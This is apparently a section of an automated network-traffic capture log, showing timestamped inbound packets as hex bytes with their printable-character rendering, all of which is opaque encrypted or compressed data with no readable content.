                                                                                                                                                            2022-09-29 12:45:24 UTC33394INData Raw: 60 46 4c a1 f8 9b 51 11 de 12 a8 a5 52 55 f2 10 8b 48 a2 9f ac 22 46 b1 d3 cb 0f db e6 96 84 b7 e3 59 ef 99 e1 9e 18 6d 70 fd 0b a1 91 00 33 02 61 1d 3c 86 c6 84 9a 64 33 7e ea a4 f9 ab b4 65 e7 ab 90 16 b9 83 c1 28 5d ed 05 ac 35 bb 43 ce 0b fe 31 d5 48 29 2c ac 01 fb 44 77 0b 33 46 ac 3b ce 0e 8c 89 04 a6 7c e0 af e8 3f 16 31 4f 75 76 43 dc 0e 65 b4 00 e0 3f 5d 94 48 51 6e f1 d9 9e 87 98 a4 c5 38 06 16 4c 94 35 bb 0b f3 15 99 b9 7a 20 6b dc 9c 6e b3 1f 72 19 93 89 0a 74 1c f3 e1 e7 2b f7 91 4a 8e 46 6d bb b2 51 a5 42 dc 1c 1a 25 50 06 e4 d7 5a 34 65 95 04 52 ce f3 e7 97 54 fd fc ce 34 bb 18 f2 70 a3 63 cc 7d 29 e3 41 ea 51 da b2 41 55 0b 6b 81 91 a0 dd 9e ad ad 31 0b 8e 85 85 86 87 4d 3f aa e6 e0 78 3a 92 02 43 b3 94 8b 56 e7 51 31 9d fa f8 3d 65 1b f5
                                                                                                                                                            Data Ascii: `FLQRUH"FYmp3a<d3~e(]5C1H),Dw3F;|?1OuvCe?]HQn8L5z knrt+JFmQB%PZ4eRT4pc})AQAUk1M?x:CVQ1=e
                                                                                                                                                            2022-09-29 12:45:24 UTC33410INData Raw: 4d 4d 6c 48 c8 d5 36 1f 5e 35 ef c6 0c 68 a0 e5 57 56 4a 66 8f f2 07 94 93 4e 4e 00 08 76 a6 57 cf b2 87 14 84 a6 60 82 17 ef f7 88 51 6e f0 00 52 7e dd 7f d3 03 5a 54 47 17 67 85 62 86 aa aa 62 31 16 ef 26 7c b8 ee 0a 79 14 1b 05 79 23 1f 3e 31 46 d2 50 c8 88 98 18 71 9f d4 c4 ee 44 76 48 01 7b 76 04 35 f8 7d 56 98 ae cf 79 99 8d 49 f1 48 42 08 8a 04 c4 7f 0a c0 79 59 8c c7 0d 77 52 5d 46 62 b1 bf 18 1f 6a e7 12 40 da 0a 60 70 ee f9 f4 f6 82 6e 45 d0 46 08 ef 23 64 e5 68 51 1f df 0c 98 93 d8 ac 8c 50 09 8e b8 89 bc bb ad 22 7b a5 d6 9c 39 d9 ed 23 fe 12 90 49 85 5f 8e 01 36 d0 c9 31 87 fd 91 ae 69 7c e8 23 38 2b 35 c1 f4 1b 04 96 b9 b3 4a ba 6a 14 9f 15 26 49 36 15 81 74 16 19 c1 64 05 a2 2c 53 9d 96 21 ef 7e 2c 94 c4 95 16 37 ee 32 ae 0d dd b1 fa 8b 78
                                                                                                                                                            Data Ascii: MMlH6^5hWVJfNNvW`QnR~ZTGgbb1&|yy#>1FPqDvH{v5}VyIHByYwR]Fbj@`pnEF#dhQP"{9#I_61i|#8+5Jj&I6td,S!~,72x
                                                                                                                                                            2022-09-29 12:45:24 UTC33426INData Raw: 6f a6 b0 6f 9a 74 d5 fe ee 70 f2 a5 c7 d0 2a 1a c1 05 b1 16 ef 4d 24 c8 9f 0c 77 22 75 d1 b6 85 45 c3 7e 4f 00 61 41 11 8a ec 12 6f ae 68 4d cb 12 7e 0e dd ba e5 96 e3 03 35 a9 d6 d9 5e 9a 3b 3d fe c1 3f ae fb ae 61 6f 37 8b ef 18 5e 82 86 96 73 41 4d c9 72 91 10 7e 94 13 fc e0 ae ba da 4e 14 c4 02 44 4f 36 19 cc 0f 41 17 b3 f6 1a bc 17 22 51 80 e9 b6 c6 c6 02 62 45 79 9c 32 62 fc c1 92 1e 44 2b f9 22 7e d9 3a 84 34 0c da 98 cf a4 e3 78 9d 72 a4 7e 72 7d 48 20 0f 8f 55 53 b0 45 ce d7 27 f2 71 9a 51 6f 69 70 2c 03 ae 5b 8a 03 89 0a 65 71 ae bc 22 a3 e3 cd ee 3a 90 78 ef b9 9d 4a 0a 79 b6 36 c7 e7 e3 5c fb 4b e0 08 c5 99 1f 34 c1 7b b0 8f f9 6f 4b a7 71 30 46 e0 45 8a 36 16 29 7f 9e 17 7a 06 9d a3 88 63 5e 97 e8 9d ff 0d ea 63 e1 00 7c 77 cc 98 58 9d 27 70
                                                                                                                                                            Data Ascii: ootp*M$w"uE~OaAohM~5^;=?ao7^sAMr~NDO6A"QbEy2bD+"~:4xr~r}H USE'qQoip,[eq":xJy6\K4{oKq0FE6)zc^c|wX'p
                                                                                                                                                            2022-09-29 12:45:24 UTC33442INData Raw: 12 c0 b8 28 9d 73 2a 13 46 18 14 fb aa 0a 11 a7 f9 7c 20 1a c8 44 5f a0 a9 b1 af d8 21 e5 c5 f0 1d 35 50 0c a4 0c be c5 a3 a1 f5 7b d8 ee 3b 23 ab 71 e5 fb ca 26 d9 6e f6 76 35 b7 82 50 46 15 b2 66 3f a4 c6 a4 86 d0 7c 03 b9 9f 58 36 0b d4 cd b0 69 14 54 87 8f a3 2d 60 ea a2 7e 62 c3 54 26 93 51 7c 16 7b 30 ee b6 d8 e5 10 e9 52 e3 10 29 40 11 39 40 46 70 79 00 88 c9 86 a0 01 ca b7 3c 36 66 9b 31 69 0b c8 b1 c8 4f b8 81 9f b1 8b 0c b6 a9 ba 8a da 8d f0 2e 6b 7c 3a d7 f7 c5 eb bb 83 d4 1c 6d dd 15 ed 99 ff b9 9d 6b 8a 43 33 c7 b4 36 db 9c df 7f 10 f0 7a b6 b8 b1 d3 55 fb 63 e0 81 74 6c 13 62 03 18 9e 7a d2 30 23 8f 63 8b 5c 93 27 a3 7d 09 54 05 2f ba f7 15 d2 f7 05 ce ff 5e 73 40 d3 a5 04 c1 c1 73 b2 1f c4 a3 3c 04 c9 8f 9c 94 0b 2d 61 67 9f 38 2c 3f 09 a4
                                                                                                                                                            Data Ascii: (s*F| D_!5P{;#q&nv5PFf?|X6iT-`~bT&Q|{0R)@9@Fpy<6f1iO.k|:mkC36zUctlbz0#c\'}T/^s@s<-ag8,?
                                                                                                                                                            2022-09-29 12:45:24 UTC33452INData Raw: 96 f6 31 c3 15 26 8a 28 1d 83 71 c2 fe 0b 61 18 4d f6 ae 27 74 76 e4 e9 08 30 33 a4 fa 3b d0 7b 4c de 5f 0c 5a 56 6c de 0d a7 a6 4c 65 ea 6b b1 dc a9 e2 e7 24 da 10 06 d3 3f 76 78 e4 4a bd aa ae 64 f9 3b 2c 62 a7 ca 32 f2 51 b9 ce 59 6b 35 d2 63 6c 4d b8 35 4f 8f e3 41 92 5d aa b2 51 f3 35 f9 e2 00 1a 38 24 28 a0 51 74 cc 00 e4 26 b4 9c c0 a0 25 60 2a e1 89 d4 31 41 1e 18 fb 61 25 c9 8c 7a fb 5c fd 39 64 a5 22 c3 21 6f 3d 10 9f 9c 47 86 5b b8 8f 8c 19 46 fd b6 d9 e4 f7 d4 cc 5a 2e 8c 19 4b 33 14 09 79 b2 9e b3 4b 9a ee c4 3b df c6 b6 b4 2e 52 3e 13 cd 82 07 de 42 9a f9 bb ec 9e a4 7b d6 5e aa 46 c7 87 1d ad 58 23 c2 35 21 a0 f5 c7 b9 df 88 5f a9 c4 f6 c1 ee 34 99 cc 4d aa 1b ca 25 fb b3 bd 75 1e 09 1b f6 d0 5b 62 0b 70 8b 9f 07 ab 7b 18 fe df d1 b4 9b c0
                                                                                                                                                            Data Ascii: 1&(qaM'tv03;{L_ZVlLek$?vxJd;,b2QYk5clM5OA]Q58$(Qt&%`*1Aa%z\9d"!o=G[FZ.K3yK;.R>B{^FX#5!_4M%u[bp{
                                                                                                                                                            2022-09-29 12:45:24 UTC33468INData Raw: 2b 72 91 b0 d7 50 09 16 48 6c 52 42 53 36 32 48 a1 95 81 04 50 a5 f6 97 b4 73 05 b9 7b 17 8c 2a 6e 0f 30 cc d9 f4 2e f0 37 ef 48 03 63 f4 21 2c 3a 15 a0 85 6f a1 cd 98 d6 49 15 7c a4 4d c7 54 96 4a 24 59 df bf 03 88 e4 84 11 c0 20 09 4a 32 85 91 aa 9f 5b c3 99 7d 90 fa 74 2d bd 84 cb 98 b2 d4 b9 66 bb 21 24 49 ed 3c 20 b4 67 2f b2 dd db b5 75 ac 36 98 14 3c d2 12 37 31 0c 53 da 0d 51 09 ee 65 63 a9 9c ee aa fd 1f b8 26 64 e2 fe 72 66 b0 ed d0 98 de b9 8e b7 b0 0f fb 2e 89 40 4d 3b cb e9 eb ad d6 8e 15 40 97 1b 64 9e 9d 26 25 37 d3 2f 8c 73 7c 5b e8 a8 b7 37 34 2a aa 29 42 af 0d 22 54 06 b0 f4 22 c0 32 1f 18 94 9f ff 78 26 70 de 88 da bb 59 c4 33 b5 fa f5 43 3d 81 4e 53 3e b9 61 fd ba cf 6a a1 03 58 be a8 8a 26 af 7e 05 c8 7d 65 32 be 2e f3 f6 31 b1 13 15
                                                                                                                                                            Data Ascii: +rPHlRBS62HPs{*n0.7Hc!,:oI|MTJ$Y J2[}t-f!$I< g/u6<71SQec&drf.@M;@d&%7/s|[74*)B"T"2x&pY3C=NS>ajX&~}e2.1
                                                                                                                                                            2022-09-29 12:45:24 UTC33484INData Raw: 26 f5 f1 12 a6 86 19 bc 48 ba 2c 68 9d 46 2f 63 cf 6a 1f 07 91 a7 fd bc c4 b8 8a 7e 95 9a fc db 53 e6 b0 86 a9 48 ec 4b d2 d2 0c 52 a0 97 5f b6 19 8d f9 7c 20 61 8f 65 70 7c a4 25 be 94 af 5c b5 57 08 d5 66 a1 42 38 8c a7 90 2e 3f 61 4b c0 ca a4 82 79 1d 8d fe b3 07 cb 74 0a 78 0d 30 0f c8 94 4c 3a d2 92 0e bb f9 9a a5 ed 02 11 0d ed 77 6d d2 32 f7 89 7c f4 31 36 09 c6 7b 85 fe b9 82 65 ce 37 e3 b4 af 95 7b 13 7c dd fe 8c 3b ee 43 e7 cc 4c a1 3c b4 38 43 31 62 41 3c 0b 5a e1 56 b4 7c c3 b2 bc 99 cf 25 12 27 74 3b c7 69 3e 32 68 db 15 35 9d f5 86 04 a4 78 ad 76 14 6b bd 46 53 d9 2f 8f b7 ff 4f 0a 2d c4 b8 47 d4 bb 3c 20 ed e1 85 60 f4 1c ba aa bc 1c 4c 71 0f 2c 5b 6b ab 77 08 bf 13 7b 66 f9 9e 80 89 37 2a b0 c9 bb 02 6a d7 a9 87 a0 a2 b4 f6 a2 6e ee 3c 2d
                                                                                                                                                            Data Ascii: &H,hF/cj~SHKR_| aep|%\WfB8.?aKytx0L:wm2|16{e7{|;CL<8C1bA<ZV|%'t;i>2h5xvkFS/O-G< `Lq,[kw{f7*jn<-
                                                                                                                                                            2022-09-29 12:45:24 UTC33500INData Raw: a3 8f d6 a0 9b 48 ba c6 86 10 7b cd 8e 7e 68 1b d8 dd 0d 49 6f c5 2f 70 93 d7 94 95 76 f0 89 70 72 ed 68 82 36 b0 d7 26 e9 9d 39 a8 50 dc 04 8e 92 94 2b 5c 56 f9 11 dc 3c 10 d1 ba 2a b7 89 ce dd ec 70 96 27 1c 06 e3 bd f6 57 17 6b 6e 8f 4c 1e 7d 29 bb 44 1a 62 7a 5a 84 65 1d 11 56 8e f3 86 88 a7 b7 1c de 6e 3c 3b 13 ad 5d b8 08 dd c4 95 c1 74 4c 9d 04 46 43 bb ce 10 65 7b 03 a2 f5 70 2e 2a f3 d2 8a 3e f5 fa 52 e9 53 b4 de ba 55 18 1f b6 ed 3b 19 98 89 d1 26 d5 2e 39 9a fc 1e 7d 9d 71 35 50 87 30 44 29 71 64 d8 4e 88 dd ca 08 29 f3 f9 4d a4 81 e2 0d 88 f6 3b eb 15 5d e8 51 80 9b b3 5d 2f 79 e3 20 1a 94 0e b4 bf 5f a3 54 90 3a bd db da 03 60 15 e5 76 7c 17 57 fb 8f e9 9a 07 40 4e d7 9b 57 1a 62 15 61 3c 1c 83 3f 69 c3 e8 37 14 05 cc 03 fb d3 e8 2c 6b 63 00
                                                                                                                                                            Data Ascii: H{~hIo/pvprh6&9P+\V<*p'WknL})DbzZeVn<;]tLFCe{p.*>RSU;&.9}q5P0D)qdN)M;]Q]/y _T:`v|W@NWba<?i7,kc
                                                                                                                                                            2022-09-29 12:45:25 UTC33516INData Raw: e8 99 c9 e7 08 95 8b 3a 81 7d 83 d0 e3 b7 7f ce ec 5e 56 3d b0 dd 1a 1e fd f2 f9 ba 3a e8 52 30 0d 7e 26 60 89 84 a4 df 46 a3 09 1f 2f 4a 74 f4 53 2a aa 00 3a 0d a0 de 64 4c 4b a4 06 57 89 ee f5 1a 78 4b e1 00 1e eb 3b 5a 1b cc 82 24 e6 ad c3 3f 90 18 a7 ef 3c d9 79 b9 d8 04 f0 12 50 61 95 78 ca 93 e3 5a 10 1a c5 e4 42 d6 88 b7 2a 82 a2 eb 72 14 6e af 94 ed 5d 85 81 b5 08 82 d5 a0 04 df e5 1d b4 8c 68 05 1d 62 cd 70 6f 7a 91 d9 ac 1f 8f 26 63 31 84 da 5e 71 a2 46 3d 59 c0 54 aa 6d 6d 88 32 f0 8f 4b f8 17 d0 b1 4d c1 3a aa 26 eb f8 fe 13 c6 56 31 f4 49 12 21 61 3c 90 ac 39 cc 06 27 e5 3f 0f 3b 68 52 7b 02 60 98 b9 07 e9 e0 a3 6f a4 1b af 4f bd b9 9e 55 a5 73 4e 48 37 8c b4 1a ba f1 f6 7f 28 a8 d2 3f 8c 8f 2d 72 e7 cd d5 73 3d d4 98 fd c5 d3 09 e6 b7 87 6b
                                                                                                                                                            Data Ascii: :}^V=:R0~&`F/JtS*:dLKWxK;Z$?<yPaxZB*rn]hbpoz&c1^qF=YTmm2KM:&V1I!a<9'?;hR{`oOUsNH7(?-rs=k
                                                                                                                                                            2022-09-29 12:45:25 UTC33532INData Raw: 28 a2 c1 79 cf d7 46 7a 07 fe a7 6f 11 61 6f 4a 7f 8b 0d 1b 0f bb 9a 90 9d 9d ab a1 38 0e ab 92 0b 4c 82 5e 8a f5 4b c0 c3 51 05 22 2e d5 c3 56 34 4c 0a c4 3a b0 39 70 a1 43 db 2d 5d be 53 ad 3f d6 60 bd b3 1e ed ef b4 bb 81 06 f3 d3 3b c9 41 bd 0a 9e a6 97 6a 95 60 c3 b9 fd aa 23 03 8d 7e b7 a9 94 cc 54 40 ce 56 ad cc 77 57 ba 0e 6c 54 90 4e 08 22 2c 09 18 56 31 ec b6 a7 ce 3d 42 7d cd a1 d9 e6 da c6 bb 41 5b 0f ab aa 08 22 13 36 62 4f 05 2c 51 98 ad 5c 86 81 7e 65 6a b3 2b e2 c6 e4 42 66 ca a1 0f fb 98 e2 6f 9e 91 14 23 0c fa 92 4f ed 81 c7 51 95 53 2b f4 32 4e b5 4c 69 4c 40 71 a5 46 77 e0 0d d8 fc 5b 20 cd e0 19 95 96 5e c6 8d e0 7f ce 74 5b 27 ef ae 2f d7 fe 9f 82 64 98 e5 cd 86 cb 3e ac 9b 9f 61 83 1c 69 04 f6 a5 e0 12 5f 9f 91 cc 1f 9c 21 3a c8 32
                                                                                                                                                            Data Ascii: (yFzoaoJ8L^KQ".V4L:9pC-]S?`;Aj`#~T@VwWlTN",V1=B}A["6bO,Q\~ej+Bfo#OQS+2NLiL@qFw[ ^t['/d>ai_!:2
                                                                                                                                                            2022-09-29 12:45:25 UTC33548INData Raw: d3 61 28 75 05 80 3a dc 95 b8 4c ae 4e c6 3e 68 c7 e6 7c e5 8f 34 36 a5 c3 ff 90 14 61 9b 8d dc 7d 37 10 a9 2b 21 61 0e a3 d8 c4 b8 8f 9a fc bb 32 d2 c1 86 7e 5c 61 21 c9 66 cd 3e ee a2 ff b1 b4 57 1f 4c 15 d9 d2 4a 55 a9 c3 84 2c 6f a7 1d 58 16 66 fd 6f 6a 11 50 f7 0e 4d bb df 92 7e d6 f2 f2 a9 f0 c1 f4 14 70 6e d4 2d 1f 02 d4 7c 20 bb ac fe 30 be 09 58 dc 97 54 45 d7 d2 d6 44 cb 1e 88 35 a2 c9 ce a9 f8 36 ed 1a 9a 59 49 8d 8d df e1 c1 66 04 7c 4a 4d 1f f7 57 4f d8 74 ef 95 22 71 39 19 b2 3c 80 28 73 96 56 e4 69 8e 99 d3 51 19 09 50 e5 b5 e0 7c c4 79 ab 71 d5 4f 3f d4 35 ae 92 65 ed ef 0a b8 6c 4e 85 77 16 75 71 9b 53 74 0a 4a 93 29 cb 54 af 9c 34 79 a8 4b 8b b1 bf df a3 e5 53 12 0d dd 29 f1 50 52 2b 52 7f ee be 22 8e 78 bf b5 59 64 8f a9 c9 8b 81 67 22
                                                                                                                                                            Data Ascii: a(u:LN>h|46a}7+!a2~\a!f>WLJU,oXfojPM~pn-| 0XTED56YIf|JMWOt"q9<(sViQP|yqO?5elNwuqStJ)T4yKS)PR+R"xYdg"
                                                                                                                                                            2022-09-29 12:45:25 UTC33564INData Raw: 42 14 a8 25 43 b9 7f ba aa 76 9b 19 28 69 c9 67 92 21 3e 30 88 09 40 13 d5 6f 7a 81 c0 23 27 54 41 2f e5 6f a2 c8 7c 99 0d 6d c6 a5 7e bb 55 11 12 71 4f 40 e7 d2 0e 75 cb 37 4f 27 39 ad 0f a8 a4 55 e6 e1 dc 81 27 bd 66 99 c0 fb aa f8 0a b8 df 0c da 0a 12 24 1c 98 e6 cc 95 23 4a 13 4a 4f f0 b7 0c 35 77 7f a6 d3 d7 17 a1 77 65 3d 68 ed af 99 c2 95 75 c4 69 fc 6b 2e 1a c2 00 73 09 d5 25 8e ca 3f d4 99 cc 74 f9 b9 28 7d 05 bb c7 1c 15 bd ea d8 62 7c 28 d3 af c3 55 4f 24 d3 ea ea f7 be 6b 16 bb 59 6f 53 40 96 b1 62 85 65 59 ef 0b 3a c6 96 9c 3b 75 f0 5f 75 30 fd 1b 36 47 18 6c 17 c7 24 45 08 26 50 73 06 a6 3e 20 3d c4 72 11 ed bf df 47 7e c3 94 0e 71 14 b1 6a 85 a5 7d b0 7d ae 0d e5 5a 97 04 2d f7 d2 28 c9 5c 17 b3 a4 8e 9f 8e 1b a1 a4 08 d8 eb ae d4 df 51 14
                                                                                                                                                            Data Ascii: B%Cv(ig!>0@oz#'TA/o|m~UqO@u7O'9U'f$#JJO5wwe=huik.s%?t(}b|(UO$kYoS@beY:;u_u06Gl$E&Ps> =rG~qj}}Z-(\Q
                                                                                                                                                            2022-09-29 12:45:25 UTC33580INData Raw: 13 f2 0b 31 ca d7 a0 83 e9 b4 d2 e5 e0 07 eb f8 28 76 ac 93 5a 17 68 db dc 33 4a 40 84 c0 20 ff dc 1f 34 88 de e0 4b f9 ff 37 3e 7d 36 b8 c3 41 16 87 b4 1e 86 ab 9a 15 a2 75 22 d2 79 ae 99 c0 a7 b8 56 61 44 7e 78 4a 45 6f b6 53 08 5f 82 53 b1 99 43 3f 0d 6d a3 0a 63 5f 2d 15 8b 82 92 1d 8a e7 9b f0 a8 6d a0 2e ff aa 3f 64 ee 7b b5 82 cf e9 1f c0 ad 6f f4 46 0b 98 1d e4 a7 19 dd 21 f2 07 15 c4 a4 d5 e0 08 31 bc 34 f4 9f a2 86 2c d6 3a b5 9e 91 dc 0f 62 0c 27 18 7f 9b 6d f0 1c ac f1 ee c4 73 73 41 cd 29 8f aa 73 5c b0 62 79 c1 a4 39 09 27 d2 a7 e5 33 1b eb a1 d3 3f 46 ff 9f 61 db a1 6d 6f 93 c1 0d 2e 2e c5 78 47 5c b6 c9 70 81 bb c0 96 c7 ea b6 67 89 4d 59 1b 9c 43 1a 37 94 a5 ed 07 0c a5 8e ee 52 89 3e ec df ac fa 2b 26 a2 9e ad 0c a1 cf 6c 3d f2 d6 20 46
                                                                                                                                                            Data Ascii: 1(vZh3J@ 4K7>}6Au"yVaD~xJEoS_SC?mc_-m.?d{oF!14,:b'mssA)s\by9'3?Famo..xG\pgMYC7R>+&l= F
                                                                                                                                                            2022-09-29 12:45:25 UTC33596INData Raw: 7a 73 e0 24 65 c6 24 1d 1f 58 e8 b2 00 d9 1e 8e 2a 25 91 6b 5e 4f 9f 9f 85 51 7f 09 3f 69 44 91 d3 01 d5 bf 45 e1 29 9a 1c 48 10 fc 6c 3e a7 49 d8 e5 75 22 44 88 92 23 8d 33 23 65 68 60 4a 20 84 64 7e d2 16 f2 96 11 54 c0 18 e7 11 9f 54 95 05 4f 8a 46 5a 57 05 30 7d 76 60 9f aa 64 6f 4d bb 28 2c 35 3e 59 46 89 e9 02 48 ac fb 8b 42 a7 28 fa 93 13 85 c0 0f 95 94 5e b8 e9 26 b4 46 7b 58 de 95 c4 ef 92 70 a5 cd 86 62 3b 9b 45 05 2c 5b 3f 3a db ab 8c 1e 1a 1f 6d 7a 77 52 6e 77 5a d2 dd 55 d6 d4 f8 41 94 99 43 35 21 19 46 22 3b 1d f5 a6 ac 30 65 c7 29 94 88 69 f9 38 4c 7b 9e 99 a0 d5 e8 e9 cd 86 c3 1a ce 6a a0 68 d5 3e 98 df fc bf 0c d0 47 0e c4 94 64 ff 42 18 ac d5 b8 27 6e 5d 52 53 63 93 9b cb 1e bd 76 9a 3e 74 56 de 41 48 45 88 51 dc 8f 00 67 3a da 54 8f 5f
                                                                                                                                                            Data Ascii: zs$e$X*%k^OQ?iDE)Hl>Iu"D#3#eh`J d~TTOFZW0}v`doM(,5>YFHB(^&F{Xpb;E,[?:mzwRnwZUAC5!F";0e)i8L{jh>GdB'n]RScv>tVAHEQg:T_
                                                                                                                                                            2022-09-29 12:45:25 UTC33612INData Raw: f2 5b 95 65 3a 30 6b e7 02 fd 84 08 a6 9f 79 0a 02 15 15 e2 de 8d 1e 4e 85 de 5c c2 67 c6 a1 08 2e 04 6c 35 57 a7 9a 60 ba f6 bf c2 14 93 fa c0 c8 1b 32 fd 51 03 fb 0a 76 ab 1b 0a 6c 6e 2e 52 bc d3 b4 bd 85 f7 f3 a2 f2 1c d2 48 45 4c b5 d5 53 0d 7f c3 03 e7 cd 86 2f 61 54 cc 64 9f 75 00 28 6d 5a 85 ca b2 3e 7b bb 7d 8a 97 38 8c e0 c9 a6 c1 d2 9c 28 bb d0 e9 48 59 cb 83 de 8d 7b b6 74 78 a5 bc 80 74 9e 9f cc 17 4d b1 03 c0 91 ea cd 06 0f 06 1b 7d e1 e4 0a ce c9 07 42 60 29 2a 8a fd 34 cf 1b 0a 62 7c d4 b9 a3 08 9b 66 0c 96 20 71 36 8f a0 85 17 c4 0f ae af 09 53 5a 11 70 f5 1a 6a 79 bc 59 da e0 c3 00 2f e7 4b 8e 55 df 57 c4 b6 08 21 0e ae 88 44 d1 9a 04 75 51 40 f8 ef bc d1 65 a3 eb b2 a9 2c 23 31 18 7a 12 ee 2b 80 16 82 fa d2 9d 2a 08 1d 93 ed 77 39 d4 1d
                                                                                                                                                            Data Ascii: [e:0kyN\g.l5W`2Qvln.RHELS/aTdu(mZ>{}8(HY{txtM}B`)*4b|f q6SZpjyY/KUW!DuQ@e,#1z+*w9
                                                                                                                                                            2022-09-29 12:45:25 UTC33628INData Raw: 63 07 5d b4 97 1e ec fc 43 fa cd b5 5f 55 c5 6b 1b 0a 83 c9 20 1d 29 ff e6 01 e8 5b b8 63 f6 f8 f5 db 2d 0f 02 cc 59 95 b5 29 a8 c2 db 2e bb 5e a6 ab b6 d0 98 bc 16 85 43 d4 ee 5e fc 74 79 06 06 88 87 1b 33 20 a7 51 d2 18 66 b0 22 20 3d 3a ba bd f4 05 52 3f 44 bb c4 30 f9 38 d5 da 7d 48 45 54 4d eb 50 87 2a 56 b7 fe 49 bb 3c 4c 14 ca 41 6e a1 4f 91 d7 cb f5 78 35 aa 06 4e bb 95 a2 01 af d9 9d b2 d3 99 af 4b 0b 0f 1e e4 7a 84 c3 37 2c 39 eb fb 37 ea c5 49 89 61 f0 5e ca 70 2c d4 a0 76 89 bf 64 b9 02 b9 8f d8 53 39 cc 90 92 e8 0f 46 89 f5 32 d9 3c 37 85 8f 57 0a d2 59 f2 94 48 f5 5d 9b a3 f7 16 1b e0 17 a1 85 1b c1 e6 d6 c5 37 ee 10 ca b3 9a 34 2a c0 d0 a3 9d ec 98 21 d6 0a 00 85 2f 4c a6 49 6e ba 8a e7 96 8d 36 70 51 cc 8e 43 78 50 09 85 2f bc 12 b1 89 cc
                                                                                                                                                            Data Ascii: c]C_Uk )[c-Y).^C^ty3 Qf" =:R?D08}HETMP*VI<LAnOx5NKz7,97Ia^p,vdS9F2<7WYH]74*!/LIn6pQCxP/
                                                                                                                                                            2022-09-29 12:45:25 UTC33644INData Raw: c8 ad e8 ad 8a 4b f4 35 6e cd 96 22 b6 bc ed 7f be 56 7e aa 3e f4 d5 88 21 76 78 f2 ec ae 85 82 5b 70 ac 51 e0 6a f5 85 a4 9e f6 6e 0c e9 52 a1 7a 0c 82 27 c0 af ec 1b 2c 85 0b 00 45 c4 9a 6d b8 e1 92 ba 6b a7 2e d6 0c b1 30 0f d8 81 90 b6 b0 18 aa 7d 2b d6 55 4e a0 ed 67 02 dc df 5c 02 fc 72 d9 62 49 cb 4d 1f 75 1a 67 4f 3e 72 ae cb d8 50 6b 46 13 f1 1f 22 d6 fd b2 14 0d 3b 9a f1 f9 84 20 d5 83 26 dc b4 7e c7 12 ec a4 89 3a 0d b7 22 5f a6 8c 78 fe 80 a2 21 8a 20 93 27 23 4a c3 be a3 c1 d9 db d9 b4 c1 6f 4d 71 26 9c b8 48 47 75 76 1a 34 44 93 bf cc ce b7 98 09 e3 d7 fb c4 72 c4 78 0e 25 27 09 40 f2 74 d6 22 66 b9 a0 ff 5c af 74 d2 15 d2 04 5a c1 2b a5 a4 7a b4 44 e2 69 04 f6 9f 1a 08 72 78 a6 64 1d 9a bd 79 2e b7 31 71 a0 7e 26 02 f4 a7 db 25 f2 0a ad 65
                                                                                                                                                            Data Ascii: K5n"V~>!vx[pQjnRz',Emk.0}+UNg\rbIMugO>rPkF"; &~:"_x! '#JoMq&HGuv4Drx%'@t"f\tZ+zDirxdy.1q~&%e
                                                                                                                                                            2022-09-29 12:45:25 UTC33660INData Raw: bb 1d 34 e1 df 86 73 c8 58 1e 4d 09 69 58 c6 f5 17 24 2c 94 70 44 ee 93 c6 5a 92 5b 58 de d3 a9 6f 4b 34 cb a9 e9 67 3b 9b 39 d1 38 5b da 1c e6 e5 b5 74 db 35 c4 e8 ae f5 3e 96 54 43 02 86 4a 68 c7 3c 5e 13 b5 82 b4 d6 75 8a 8c e8 e1 11 f5 7d e2 ec 1d 21 a7 34 e6 10 19 90 5f b4 45 2b b6 b3 4f 42 69 8c 9c 10 4c ae 55 21 0e c7 86 37 6a 83 2c 2e 5b 52 39 86 4b de 32 2b 66 31 de 94 1a f2 5e c4 9d b6 b6 28 10 00 a9 e2 34 4d b3 80 c4 e5 fc db 14 9f 60 63 96 f9 c9 7b e2 16 ca d0 2c b7 a3 19 4b 65 4e 21 1a 91 6d d5 44 87 3d af d7 71 58 ca de a0 8f bd ec a6 60 69 a7 17 2d d0 f0 8f a8 06 b0 ea a2 50 40 6f cf bc 33 97 69 12 ab ff 5d 70 f7 dc 79 93 60 09 19 f8 18 0a 79 ee ab c8 a3 45 74 d8 90 cb c6 8d d7 b9 f5 b6 af ef d7 f8 70 e4 55 22 13 7c bc dc d4 26 59 d0 7e 19
                                                                                                                                                            Data Ascii: 4sXMiX$,pDZ[XoK4g;98[t5>TCJh<^u}!4_E+OBiLU!7j,.[R9K2+f1^(4M`c{,KeN!mD=qX`i-P@o3i]py`yEtpU"|&Y~
                                                                                                                                                            2022-09-29 12:45:25 UTC33676INData Raw: c2 7e 48 58 b5 d8 6e dd dc c5 b2 1f 05 cf c8 9b b7 27 2f b8 eb e3 a4 73 0b 14 fb 11 91 8e ec c4 1d 0d a7 05 0a 63 01 6e 9e 9d d6 cf 41 79 51 ea dc 99 b3 8c 75 76 6a 9f f5 a6 15 29 ca 71 ed 6c 68 67 84 27 5a 33 c0 8d f4 00 93 df f1 e5 26 ff 3f ec b5 0a 6a a6 a5 07 22 db 5a a1 27 e7 af 5a 04 3a 2b 9d 2f cc 3c 36 02 f7 b4 02 53 f4 15 c0 17 4d 56 19 29 ea 8c 33 fe 59 11 72 ab 1e 57 b7 46 10 66 e4 2c ca 92 19 0b 3a b6 59 9b e0 ba fe 7a d5 9e 96 7d e5 98 71 c6 87 60 f5 18 2f 89 f5 82 38 3a 47 99 d9 b5 7d 99 be 31 50 1b b3 13 df 2d ec 1d 82 f8 e6 e3 49 c5 39 4c e0 f5 f8 7f a9 30 e5 37 2f 34 96 23 7d 86 51 0d 99 6a 0b af c1 ce bc 52 be 1a ec 90 77 02 00 e6 11 cd 85 2a f9 e8 dd f6 ec 04 49 e1 a9 4f 0c fc 95 2b ad bd e1 db 82 ec 37 0f 6b 49 a1 81 e5 65 60 83 ee d8
                                                                                                                                                            Data Ascii: ~HXn'/scnAyQuvj)qlhg'Z3&?j"Z'Z:+/<6SMV)3YrWFf,:Yz}q`/8:G}1P-I9L07/4#}QjRw*IO+7kIe`
